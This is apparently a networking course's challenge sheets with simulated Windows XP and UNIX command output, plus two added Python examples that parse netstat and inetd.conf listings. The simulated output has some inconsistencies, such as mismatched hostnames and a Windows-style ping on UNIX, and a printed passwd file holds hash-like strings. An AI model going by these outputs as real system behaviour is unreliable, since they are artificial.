        Default Gateway . . . . . . . . . : 192.168.0.1

Ethernet adapter Local Area Connection:

        Media State . . . . . . . . . . . : Media disconnected

> ipconfig /all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : freds
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Peer-Peer
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Wireless Network Connection 4:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : Intel(R) PRO/Wireless 2200BG Net
        Physical Address. . . . . . . . . : 00-35-00-54-02-20
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 192.168.0.3
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1
        DHCP Server . . . . . . . . . . . : 192.168.0.1
        DNS Servers . . . . . . . . . . . : 192.168.0.1
        Lease Obtained. . . . . . . . . . : 14 October 2007 19:29:50
        Lease Expires . . . . . . . . . . : 17 October 2007 19:29:50
> tracert 192.168.0.3

Tracing route to bills [192.168.0.3]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  bills [192.168.0.3]

Trace complete.

> tracert 192.168.0.20

Tracing route to 192.168.0.20 over a maximum of 30 hops

  1  Request timed out.

Windows Challenge 2
Outline
This challenge involves the configuration of network properties for Windows.
Objectives
The objectives of this challenge are to:

Use NSLOOKUP.
Show the ARP cache.
Show the Windows version.
Use IPCONFIG to show details.

Example
Press return to boot!
Booting PC...in Windows XP
>
Use:
VER
IPCONFIG
IPCONFIG /ALL
NSLOOKUP
ARP -a
ARP
NET
TRACERT
or PING
> nslookup www.intel.com
Name: www.intel.com
Address: 84.53.136.24

> arp -a

Interface: 192.168.0.3 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-38-4d-10-d6-43     dynamic

C:\> ver
Microsoft Windows XP [Version 5.1.2600]
> ipconfig

Windows IP Configuration

Ethernet adapter Wireless Network Connection 4:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.0.3
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1

Ethernet adapter Local Area Connection:

        Media State . . . . . . . . . . . : Media disconnected

> ipconfig /all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : freds
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Peer-Peer
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Wireless Network Connection 4:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : Intel(R) PRO/Wireless 2200BG Net
        Physical Address. . . . . . . . . : 00-35-00-54-02-20
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 192.168.0.3
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1
        DHCP Server . . . . . . . . . . . : 192.168.0.1
        DNS Servers . . . . . . . . . . . : 192.168.0.1
        Lease Obtained. . . . . . . . . . : 14 October 2007 19:29:50
        Lease Expires . . . . . . . . . . : 17 October 2007 19:29:50

Windows Challenge 3
Outline
This challenge involves the configuration of network properties for Windows.

Objectives
The objectives of this challenge are to:

Use netstat.
Use assoc.
Use chkdsk.

Example
C:\> netstat /?

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v] [interval]

  -a            Displays all connections and listening ports.
  -b            Displays the executable involved in creating each connection or
                listening port. In some cases well-known executables host
                multiple independent components, and in these cases the
                sequence of components involved in creating the connection
                or listening port is displayed. In this case the executable
                name is in [] at the bottom, on top is the component it called,
                and so forth until TCP/IP was reached. Note that this option
                can be time-consuming and will fail unless you have sufficient
                permissions.
  -e            Displays Ethernet statistics. This may be combined with the -s
                option.
  -n            Displays addresses and port numbers in numerical form.
  -o            Displays the owning process ID associated with each connection.
  -p proto      Shows connections for the protocol specified by proto; proto
                may be any of: TCP, UDP, TCPv6, or UDPv6. If used with the -s
                option to display per-protocol statistics, proto may be any of:
                IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, or UDPv6.
  -r            Displays the routing table.
  -s            Displays per-protocol statistics. By default, statistics are
                shown for IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, and UDPv6;
                the -p option may be used to specify a subset of the default.
  -v            When used in conjunction with -b, will display sequence of
                components involved in creating the connection or listening
                port for all executables.
  interval      Redisplays selected statistics, pausing interval seconds
                between each display. Press CTRL+C to stop redisplaying
                statistics. If omitted, netstat will print the current
                configuration information once.

C:\> netstat -a

Active Connections

  Proto  Local Address          Foreign Address          State
  TCP    freds:smtp             freds:0                  LISTENING
  TCP    freds:http             freds:0                  LISTENING
  TCP    freds:epmap            freds:0                  LISTENING
  TCP    freds:https            freds:0                  LISTENING
  TCP    freds:microsoft-ds     freds:0                  LISTENING
  TCP    freds:1026             freds:0                  LISTENING
  TCP    freds:2393             freds:0                  LISTENING
  TCP    freds:2394             freds:0                  LISTENING
  TCP    freds:2725             freds:0                  LISTENING
  TCP    freds:3389             freds:0                  LISTENING
  TCP    freds:8674             localhost:62514          ESTABLISHED
  TCP    freds:8679             localhost:62514          ESTABLISHED
  TCP    freds:8680             localhost:62516          ESTABLISHED
  TCP    freds:8681             localhost:62516          ESTABLISHED
  TCP    freds:8898             localhost:8899           ESTABLISHED
  TCP    freds:8899             localhost:8898           ESTABLISHED
  TCP    freds:8901             localhost:8902           ESTABLISHED
  TCP    freds:8902             localhost:8901           ESTABLISHED
  TCP    freds:62514            freds:0                  LISTENING
  TCP    freds:62514            localhost:8674           ESTABLISHED
  TCP    freds:62514            localhost:8679           ESTABLISHED
  TCP    freds:62516            freds:0                  LISTENING
  TCP    freds:62516            localhost:8680           ESTABLISHED
  TCP    freds:62516            localhost:8681           ESTABLISHED
  TCP    freds:netbios-ssn      freds:0                  LISTENING
  TCP    freds:9106             s.nowhere.ac.uk:1026     ESTABLISHED
  TCP    freds:9111             mail.nowhere.ac.uk:1402  ESTABLISHED
  TCP    freds:netbios-ssn      freds:0                  LISTENING
  UDP    freds:snmp             *:*
  UDP    freds:microsoft-ds     *:*
  UDP    freds:isakmp           *:*
  UDP    freds:983              *:*
  UDP    freds:1276             *:*
  UDP    freds:1775             *:*
  UDP    freds:2325             *:*
  UDP    freds:2326             *:*
  UDP    freds:3456             *:*
  UDP    freds:4500             *:*
  UDP    freds:9109             *:*
  UDP    freds:ntp              *:*
  UDP    freds:1900             *:*
  UDP    freds:2126             *:*
  UDP    freds:62514            *:*
  UDP    freds:ntp              *:*
  UDP    freds:netbios-ns       *:*
  UDP    freds:netbios-dgm      *:*
  UDP    freds:1900             *:*
  UDP    freds:ntp              *:*
  UDP    freds:netbios-ns       *:*
  UDP    freds:netbios-dgm      *:*
  UDP    freds:1900             *:*

C:\> netstat -b

Active Connections

  Proto  Local Address          Foreign Address          State           PID
  TCP    freds:8674             localhost:62514          ESTABLISHED     3660
  [vpngui.exe]

  TCP    freds:8679             localhost:62514          ESTABLISHED     976
  [ipseclog.exe]

  TCP    freds:8680             localhost:62516          ESTABLISHED     260
  [cvpnd.exe]

  TCP    freds:8681             localhost:62516          ESTABLISHED     3660
  [vpngui.exe]

  TCP    freds:8898             localhost:8899           ESTABLISHED     2160
  [firefox.exe]

  TCP    freds:8899             localhost:8898           ESTABLISHED     2160
  [firefox.exe]

  TCP    freds:8901             localhost:8902           ESTABLISHED     2160
  [firefox.exe]

  TCP    freds:8902             localhost:8901           ESTABLISHED     2160
  [firefox.exe]

  TCP    freds:62514            localhost:8679           ESTABLISHED     260
  [cvpnd.exe]

  TCP    freds:62514            localhost:8674           ESTABLISHED     260
  [cvpnd.exe]

  TCP    freds:62516            localhost:8681           ESTABLISHED     976
  [ipseclog.exe]

  TCP    freds:62516            localhost:8680           ESTABLISHED     976
  [ipseclog.exe]

  TCP    freds:9106             s.nowhere.ac.uk:1026     ESTABLISHED     3648
  [OUTLOOK.EXE]

  TCP    freds:9111             mail.nowhere.ac.uk:1402  ESTABLISHED     3648
  [OUTLOOK.EXE]

C:\> netstat -e

Interface Statistics

                           Received            Sent

Bytes                      88491198        45842271
Unicast packets              164944          153335
Non-unicast packets             452             296
Discards                          0               0
Errors                            0               2
Unknown protocols              1007

C:\> netstat -n

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    127.0.0.1:8674         127.0.0.1:62514        ESTABLISHED
  TCP    127.0.0.1:8679         127.0.0.1:62514        ESTABLISHED
  TCP    127.0.0.1:8680         127.0.0.1:62516        ESTABLISHED
  TCP    127.0.0.1:8681         127.0.0.1:62516        ESTABLISHED
  TCP    127.0.0.1:8898         127.0.0.1:8899         ESTABLISHED
  TCP    127.0.0.1:8899         127.0.0.1:8898         ESTABLISHED
  TCP    127.0.0.1:8901         127.0.0.1:8902         ESTABLISHED
  TCP    127.0.0.1:8902         127.0.0.1:8901         ESTABLISHED
  TCP    127.0.0.1:62514        127.0.0.1:8674         ESTABLISHED
  TCP    127.0.0.1:62514        127.0.0.1:8679         ESTABLISHED
  TCP    127.0.0.1:62516        127.0.0.1:8680         ESTABLISHED
  TCP    127.0.0.1:62516        127.0.0.1:8681         ESTABLISHED
  TCP    10.0.212.177:9106      10.0.8.10:1026         ESTABLISHED
  TCP    10.0.212.177:9111      10.0.222.7:1402        ESTABLISHED
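An added example, not part of the challenge, showing how the netstat -b style output above (connection row followed by the owning executable in brackets) can be parsed into records, so that the executables holding connections to hosts other than the machine itself can be listed. The sample text is constructed from a few of the rows shown; the [System] row is added here.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of netstat -b on Windows XP, reusing rows from
# the challenge output; the final listening row is added to show a non-ESTABLISHED case.
SAMPLE_NETSTAT_B = """\
Active Connections

  Proto  Local Address          Foreign Address          State           PID
  TCP    freds:8674             localhost:62514          ESTABLISHED     3660
  [vpngui.exe]

  TCP    freds:62514            localhost:8674           ESTABLISHED     260
  [cvpnd.exe]

  TCP    freds:9106             s.nowhere.ac.uk:1026     ESTABLISHED     3648
  [OUTLOOK.EXE]

  TCP    freds:9111             mail.nowhere.ac.uk:1402  ESTABLISHED     3648
  [OUTLOOK.EXE]

  TCP    freds:3389             freds:0                  LISTENING       4
  [System]
"""

# A connection row: proto, local, foreign, state, pid (as printed by -b and -o).
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")
# The executable line that -b prints underneath its connection row.
EXE_RE = re.compile(r"^\s*\[(.+)\]\s*$")


def parse_netstat_b(text: str):
    """Return a list of dicts with keys proto, local, foreign, state, pid, exe.

    The executable name appears on the line after its connection row, so each
    [name] line is attached to the most recent row that has no name yet.
    """
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            proto, local, foreign, state, pid = m.groups()
            rows.append({"proto": proto, "local": local, "foreign": foreign,
                         "state": state, "pid": int(pid), "exe": None})
            continue
        m = EXE_RE.match(line)
        if m and rows and rows[-1]["exe"] is None:
            rows[-1]["exe"] = m.group(1)
    return rows


def host_of(endpoint: str) -> str:
    """Split 'host:port' on the last colon and return the host part."""
    return endpoint.rsplit(":", 1)[0]


def external_connections(rows, local_hosts=("localhost", "127.0.0.1")):
    """Established rows whose peer is neither loopback nor this host itself."""
    out = []
    for r in rows:
        peer = host_of(r["foreign"])
        if (r["state"] == "ESTABLISHED" and peer not in local_hosts
                and peer != host_of(r["local"])):
            out.append(r)
    return out


def by_executable(rows):
    """Map executable name -> sorted list of (proto, local, foreign, state)."""
    summary = defaultdict(list)
    for r in rows:
        summary[r["exe"]].append((r["proto"], r["local"], r["foreign"], r["state"]))
    return {exe: sorted(v) for exe, v in summary.items()}
```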

C:\> netstat -r

Route Table
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...00 15 00 34 02 f0 ...... Intel(R) PRO/Wireless 2200BG Network Connection - Deterministic Network Enhancer Miniport
0x3 ...00 03 0d 36 38 99 ...... Realtek RTL8169/8110 Family Gigabit Ethernet NIC - Deterministic Network Enhancer Miniport
0x20005 ...00 05 9a 3c 78 00 ...... Cisco Systems VPN Adapter - Deterministic Network Enhancer Miniport
===========================================================================
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.0.1     192.168.0.2      25
        127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1       1
         10.0.0.0      255.255.0.0     10.0.212.177    10.0.212.177      25
         10.0.1.0    255.255.255.0     10.0.212.177    10.0.212.177       1
         10.0.2.0    255.255.255.0     10.0.212.177    10.0.212.177       1
         10.0.5.0    255.255.255.0     10.0.212.177    10.0.212.177       1
         10.0.8.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.13.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.14.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.15.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.16.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.22.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.26.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.27.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.28.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.29.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.30.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.31.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.35.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.36.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.37.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.50.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.62.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.63.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.64.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.65.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.74.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.75.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.76.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.77.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.78.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.79.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.80.0    255.255.255.0     10.0.212.177    10.0.212.177       1
        10.0.81.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.101.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.102.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.103.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.112.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.140.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.162.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.163.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.165.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.166.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.210.2  255.255.255.255      192.168.0.1     192.168.0.2       1
       10.0.211.0    255.255.255.0     10.0.212.177    10.0.212.177       1
     10.0.212.177  255.255.255.255        127.0.0.1       127.0.0.1      25
       10.0.221.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.222.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.223.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.244.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.246.0    255.255.255.0     10.0.212.177    10.0.212.177       1
       10.0.247.0    255.255.255.0     10.0.212.177    10.0.212.177       1
     10.0.255.255  255.255.255.255     10.0.212.177    10.0.212.177      25
      192.168.0.0    255.255.255.0      192.168.0.2     192.168.0.2      25
      192.168.0.1  255.255.255.255      192.168.0.2     192.168.0.2       1
      192.168.0.2  255.255.255.255        127.0.0.1       127.0.0.1      25
    192.168.0.255  255.255.255.255      192.168.0.2     192.168.0.2      25
        224.0.0.0        240.0.0.0     10.0.212.177    10.0.212.177      25
        224.0.0.0        240.0.0.0      192.168.0.2     192.168.0.2      25
  255.255.255.255  255.255.255.255     10.0.212.177    10.0.212.177       1
  255.255.255.255  255.255.255.255      192.168.0.2               3       1
  255.255.255.255  255.255.255.255      192.168.0.2     192.168.0.2       1
Default Gateway:       192.168.0.1
===========================================================================
Persistent Routes:
  None
C:\> netstat -s

IPv4 Statistics

  Packets Received                   = 182154
  Received Header Errors             = 0
  Received Address Errors            = 55
  Datagrams Forwarded                = 0
  Unknown Protocols Received         = 0
  Received Packets Discarded         = 514
  Received Packets Delivered         = 181638
  Output Requests                    = 176717
  Routing Discards                   = 0
  Discarded Output Packets           = 0
  Output Packet No Route             = 0
  Reassembly Required                = 4
  Reassembly Successful              = 2
  Reassembly Failures                = 0
  Datagrams Successfully Fragmented  = 0
  Datagrams Failing Fragmentation    = 0
  Fragments Created                  = 0

ICMPv4 Statistics

                            Received    Sent
  Messages                  12902       12974
  Errors                    0           22
  Destination Unreachable   5965        5964
  Time Exceeded             0           0
  Parameter Problems        0           0
  Source Quenches           0           0
  Redirects                 0           0
  Echos                     3           6985
  Echo Replies              6934        3
  Timestamps                0           0
  Timestamp Replies         0           0
  Address Masks             0           0
  Address Mask Replies      0           0

TCP Statistics for IPv4

  Active Opens                        = 1970
  Passive Opens                       = 315
  Failed Connection Attempts          = 26
  Reset Connections                   = 440
  Current Connections                 = 14
  Segments Received                   = 150768
  Segments Sent                       = 145270
  Segments Retransmitted              = 52

UDP Statistics for IPv4

  Datagrams Received    = 12003
  No Ports              = 24829
  Receive Errors        = 1
  Datagrams Sent        = 18306

C:\> set
ALLUSERSPROFILE=C:\Documents and Settings\All Users.WINDOWS
APPDATA=C:\Documents and Settings\Fred\Application Data
CLASSPATH=.;C:\Program Files\Java\jre1.5.0\lib\ext\QTJava.zip
CLIENTNAME=Console
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=freds
ComSpec=C:\WINDOWS\system32\cmd.exe
DISPLAY=localhost:0.0
EDITOR=vi
C:\> bootcfg /?

BOOTCFG /parameter [arguments]

Description:
    This command line tool can be used to configure, query, change or
    delete the boot entry settings in the BOOT.INI file.

Parameter List:
    /Copy       Makes a copy of an existing boot entry [operating
                systems] section for which you can add OS options to.

    /Delete     Deletes an existing boot entry in the [operating
                systems] section of the BOOT.INI file. You must specify
                the entry# to delete.

    /Query      Displays the current boot entries and their settings.

    /Raw        Allows the user to specify any switch options to be
                added for a specified boot entry.

    /Timeout    Allows the user to change the Timeout value.

    /Default    Allows the user to change the Default boot entry.

    /EMS        Allows the user to configure the /redirect switch
                for headless support for a boot entry.

    /Debug      Allows the user to specify the port and baudrate for
                remote debugging for a specified boot entry.

    /Addsw      Allows the user to add predefined switches for
                a specific boot entry.

    /Rmsw       Allows the user to remove predefined switches for a
                specific boot entry.

    /Dbg1394    Allows the user to configure 1394 port debugging
                for a specified boot entry.

    /?          Displays this help/usage.

Examples:
    BOOTCFG /Copy /?
    BOOTCFG /Delete /?
    BOOTCFG /Query /?
    BOOTCFG /Raw /?
    BOOTCFG /Timeout /?
    BOOTCFG /EMS /?
    BOOTCFG /Debug /?
    BOOTCFG /Addsw /?
    BOOTCFG /Rmsw /?
    BOOTCFG /Dbg1394 /?
    BOOTCFG /Default /?
    BOOTCFG /?

C:\> bootcfg

Boot Loader Settings
--------------------
timeout: 30
default: multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

Boot Entries
------------
Boot entry ID:   1
Friendly Name:   "Microsoft Windows XP Professional"
Path:            multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
OS Load Options: /noexecute=optin /noexecute=alwaysoff /fastdetect

C:\> diskpart
Microsoft DiskPart version 5.1.3565
Copyright (C) 1999-2003 Microsoft Corporation.
On computer: freds
C:\> assoc /?
.aac=Winamp.File
.aif=AIFFFile
.ARC=WinZip
.ARJ=WinZip
.asf=Winamp.File

UNIX Challenge 4
Outline
This challenge involves the configuration of network properties for UNIX.
Objectives
The objectives of this challenge are to:

Set the IP address.
Set the subnet mask.
Set the MTU.
Ping the Ethernet port while disabled.
Enable the port.
Ping the Ethernet port while enabled.

Example
% ifconfig eth0 192.168.0.1 netmask 255.255.255.0
% ifconfig eth0 mtu 1500
% ping 192.168.0.1
Pinging 192.168.0.1 with 32 bytes of data:
Timeout for 192.168.0.1
Timeout for 192.168.0.1
Timeout for 192.168.0.1
Timeout for 192.168.0.1
Ping statistics for 192.168.0.1:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
% ifconfig eth0 up
% ping 192.168.0.1
Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1 bytes=32 time=1ms TTL=128
Reply from 192.168.0.1 bytes=32 time=1ms TTL=128
Reply from 192.168.0.1 bytes=32 time=1ms TTL=128
Reply from 192.168.0.1 bytes=32 time=1ms TTL=128
Ping statistics for 192.168.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
% ifconfig eth0 promisc

UNIX Challenge 5
Outline
This challenge involves the configuration of network properties for UNIX.
Objectives
The objectives of this challenge are to:

Set the IP address.
Set the subnet mask.
Set the MTU.
Enable the port.

Example

% ls
% cd bin
[/bin ]% ls
[/bin ]% cd /etc
[/etc ]% ls
[/etc ]% nslookup www.intel.com
Name: www.intel.com
Address: 84.53.136.24
[/etc ]% cat hosts
138.38.32.45 bath
198.4.6.3 compuserve
193.63.76.2 niss
148.88.8.84 hensa
146.176.2.3 janet
146.176.151.51 sun
[/etc ]% cat protocols
# The form for each entry is:
# "official protocol name" "protocol number" "aliases"
# Internet (IP) protocols
ip 0 IP # internet protocol, pseudo protocol number
icmp 1 ICMP # internet control message protocol
ggp 3 GGP # gateway-gateway protocol
tcp 6 TCP # transmission control protocol
egp 8 EGP # exterior gateway protocol
pup 12 PUP # PARC universal packet protocol
udp 17 UDP # user datagram protocol
hmp 20 HMP # host monitoring protocol
xns-idp 22 XNS-IDP # Xerox NS IDP
rdp 27 RDP # "reliable datagram" protocol
[/etc ]% cat netgroups
# The format for each entry is: groupname member1 member2 ...
# (hostname, username, domainname)
engineering hardware software (host3, mikey, hp)
hardware (hardwhost1, chm, hp) (hardwhost2, dae, hp)
software (softwhost1, jad, hp) (softwhost2, dds, hp)
[/etc ]% cat passwd
root:FDEc6.32:1:0:Super user:/user:/bin/csh
fred:jt.06hLdiSDaA:2:4:Fred Blogs:/user/fred:/bin/csh
fred2:jtY067SdiSFaA:3:4:Fred Smith:/user/fred2:/bin/csh
[/etc ]% cat groups
root::0:root
other::1:root,hpdb
bin::2:root,bin
sys::3:root,uucp
freds_grp::4:fred,fred2,fred3
[/etc ]% cat mnttab
/dev/dsk/c201d6s0 / hfs defaults 0 1 850144122 1
/dev/dsk/c201d5s0 /win hfs defaults 1 2 850144127 1
castor:/win /net/castor_win nfs rw,suid 0 0 850144231 0
miranda:/win /net/miranda_win nfs rw,suid 0 0 850144291 0
spica:/usr/opt /opt nfs rw,suid 0 0 850305936 0
triton:/win /net/triton_win nfs rw,suid 0 0 850305936 0
[/etc ]% cat inetd.conf
# "service_name" "sock_type" "proto" "flags" "user" "server_path" "args"
# Echo, discard and daytime are used primarily for testing.
echo stream tcp nowait root internal
echo dgram udp wait root internal
discard stream tcp nowait root internal
discard dgram udp wait root internal
daytime stream tcp nowait root internal
daytime dgram udp wait root internal
time dgram udp wait root internal
#
# These are standard services.
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/wu.ftpd
telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd
#
# Shell, login, exec and talk are BSD protocols.
shell stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rshd
login stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rlogind
talk dgram udp wait root /usr/sbin/tcpd /usr/sbin/in.ntalkd
ntalk dgram udp wait root /usr/sbin/tcpd /usr/sbin/in.ntalkd
#
# Pop mail servers
pop3 stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.pop3d
#
bootps dgram udp wait root /usr/sbin/tcpd /usr/sbin/in.bootpd
#
finger stream tcp nowait daemon /usr/sbin/tcpd /usr/sbin/in.fingerd
systat stream tcp nowait guest /usr/sbin/tcpd /usr/bin/ps -auwwx
netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
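An added example, not from the challenge, that parses inetd.conf in the field order given by the header comment above and lists which services are enabled, which are served internally by inetd, and which external programs run as root without the tcpd wrapper in front of them. The sample file is constructed from the entries shown, plus a tftp line added here to exercise the last check.

```python
from typing import NamedTuple, Tuple

# Constructed sample in inetd.conf format. The entries follow the challenge's
# listing; the tftp line is added to show an unwrapped root service being reported.
SAMPLE_INETD = """\
# "service_name" "sock_type" "proto" "flags" "user" "server_path" "args"
echo stream tcp nowait root internal
discard dgram udp wait root internal
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/wu.ftpd
telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd
shell stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rshd
finger stream tcp nowait daemon /usr/sbin/tcpd /usr/sbin/in.fingerd
systat stream tcp nowait guest /usr/sbin/tcpd /usr/bin/ps -auwwx
netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd -s /tftpboot
"""

TCPD = "/usr/sbin/tcpd"


class InetdService(NamedTuple):
    name: str
    sock_type: str
    proto: str
    flags: str
    user: str
    server: str        # program path, or the literal "internal"
    args: Tuple[str, ...]


def parse_inetd(text: str):
    """Parse inetd.conf lines into InetdService records, skipping comments and blanks."""
    services = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue   # malformed entry; inetd itself logs and skips such lines
        name, sock_type, proto, flags, user, server, *args = fields
        services.append(InetdService(name, sock_type, proto, flags, user, server, tuple(args)))
    return services


def enabled_services(text: str):
    """Names of all services inetd would listen for."""
    return [s.name for s in parse_inetd(text)]


def internal_services(text: str):
    """Services handled inside inetd itself (no external program)."""
    return [s.name for s in parse_inetd(text) if s.server == "internal"]


def unwrapped_root_services(text: str, wrapper: str = TCPD):
    """External programs started as root with no TCP wrapper in front of them."""
    return [s.name for s in parse_inetd(text)
            if s.user == "root" and s.server not in ("internal", wrapper)]


def actual_program(service: InetdService) -> str:
    """The program that really serves the request: the first argument when tcpd wraps it."""
    if service.server == TCPD and service.args:
        return service.args[0]
    return service.server
```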
% netstat

TCP
   Local Address        Remote Address                  Swind Send-Q Rwind Recv-Q State
-------------------- ------------------------------- ----- ------ ----- ------ -----------
selene.35104         mer-cluster1.napier.ac.uk.524   22516      0  8760      0 ESTABLISHED
selene.35145         mer-cluster1.napier.ac.uk.524   22624      0  8760      0 ESTABLISHED
selene.35248         mer-cluster1.napier.ac.uk.524   22356      0  8760      0 ESTABLISHED
selene.38513         sighthill-gpas.napier.ac.uk.524 20316      0  8760      0 ESTABLISHED
selene.53479         mer-cluster1.napier.ac.uk.524   11456      0  8760      0 ESTABLISHED
selene.40969         swallow.sunsite.org.uk.ftp       9660      0  9660      0 CLOSE_WAIT
localhost.1106       localhost.47733                 32768      0 32768      0 CLOSE_WAIT
selene.58635         mer-cluster1.napier.ac.uk.524    7528      0  8760      0 ESTABLISHED
selene.60344         mer-cluster1.napier.ac.uk.524    7852      0  8760      0 ESTABLISHED
selene.50401         selene.ftp                      32768      0 32768      0 CLOSE_WAIT
selene.telnet        SOC001878.4010                  17389      0  8760      0 ESTABLISHED
selene.888           zeus.nfsd                        8760      0  8760      0 ESTABLISHED
selene.telnet        ACBC2690.ipt.aol.com.3532       16992      1  9520      0 ESTABLISHED

Active UNIX domain sockets
Address     Type       Vnode       Conn     Local Addr               Remote Addr
30000b901a8 stream-ord 30000b2e658 00000000 /etc/.nds_uamcd_sock
30000b90d08 stream-ord 300016ad8d0 00000000 /var/.ndsso_unixsock
30000b90008 stream-ord 30001bd75c0 00000000 /var/nds/nds_identsock
30000b91388 dgram      300008bb228 00000000 /var/n4u/slpsrvsock.2550

UNIX Tutorial
MOVING AROUND
Initially you will be in the top-level directory (/).
1 List the directory with the ls command.
What directories are available?
2 Change the current directory to /bin with the cd bin command.
List some of the programs in this directory.
3 Move back to the top-level with cd .. or cd /.
4 Move into other directories using the cd command, and list their contents with ls.
The key directories are /bin (where many of the commands are stored), /etc (where many of
the configuration files are stored), /sbin (where extra networking commands are stored),
/usr (where the user files are stored) and /dev (where the device drivers are stored).
LOCATING IMPORTANT NETWORKING FILES
Search the directories and find the following files: ifconfig, dhcpinfo, inetd.conf, ls, cd,
mnttab, network, services, hosts and protocols.
CONFIGURING THE INTERFACE
The ifconfig command can be used to view the network settings on the interface card.
1 Enter the ifconfig command, and view the help page.
2 Enter the ifconfig -a command, and determine the network configuration.
List the network settings.
SHOWING THE ARP CACHE
The ARP table contains the mapping of IP addresses to MAC addresses, on the local
network.

1 Enter the arp command, and determine the options used with arp.
2 Enter the arp -a command, to show the current ARP table.
List some of the MAC address and IP address mappings.
SHOWING PROCESSES
The ps command can be used to show currently running processes.
